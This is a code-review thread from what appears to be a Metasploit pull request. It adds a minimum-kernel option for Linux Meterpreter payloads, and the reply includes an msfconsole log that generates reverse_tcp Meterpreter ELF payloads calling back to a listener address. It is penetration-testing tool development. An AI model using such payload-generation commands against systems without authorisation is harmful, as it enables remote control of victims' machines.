lib/msf/base/sessions/mettle_config.rb

```diff
@@ -18,6 +18,11 @@ def initialize(info = {})
               'MeterpreterTryToFork',
               'Fork a new process if the functionality is available',
               default: false
+            ),
+            OptBool.new(
+              'MeterpreterLegacyElf',
+              'Legacy stageless ELF file without in-memory loading, works with Linux < 3.17',
+              default: false
             )
```

Comment:
I think instead of a boolean, `MeterpreterLegacyElf` option, I think we should use an enum to make things more clear and future-proof.

```suggestion
            OptEnum.new(
              'MeterpreterLinuxMinKernel',
              'Linux minimum kernel version for compatibility',
              default: '2.x+',
              [ '2.x+', '3.17+' ]
            )
```

In this example though, we should swap `2.x+` should be replaced with the oldest version of the Linux kernel that we support.

Reply:
Included warnings on Setuid with unsupported kernel version
```
msf6 payload(linux/x86/meterpreter_reverse_tcp) > set lhost eth0
lhost => 172.30.245.122
msf6 payload(linux/x86/meterpreter_reverse_tcp) > set PrependSetuid false
PrependSetuid => false
msf6 payload(linux/x86/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel
MeterpreterLinuxMinKernel => 2.6+
msf6 payload(linux/x86/meterpreter_reverse_tcp) > generate -f raw -o ~/Public/metsrv.elf
[*] Writing 1137332 bytes to ~/Public/metsrv.elf...
msf6 payload(linux/x86/meterpreter_reverse_tcp) > set PrependSetuid true
PrependSetuid => true
msf6 payload(linux/x86/meterpreter_reverse_tcp) > generate -f raw -o ~/Public/metsrv.elf
[!] Prepends options only works with MeterpreterLinuxMinKernel = 3.17+.
[*] Writing 1137339 bytes to ~/Public/metsrv.elf...
msf6 payload(linux/x86/meterpreter_reverse_tcp) > use payload/linux/x86/meterpreter/reverse_tcp
msf6 payload(linux/x86/meterpreter/reverse_tcp) > set PrependSetUid true
PrependSetUid => true
msf6 payload(linux/x86/meterpreter/reverse_tcp) > set lhost eth0
lhost => 172.30.245.122
msf6 payload(linux/x86/meterpreter/reverse_tcp) > set MeterpreterLinuxMinKernel
MeterpreterLinuxMinKernel => 2.6+
msf6 payload(linux/x86/meterpreter/reverse_tcp) > generate -f raw -o ~/Public/metsrv.elf
[*] Writing 130 bytes to ~/Public/metsrv.elf...
msf6 payload(linux/x86/meterpreter/reverse_tcp) >
```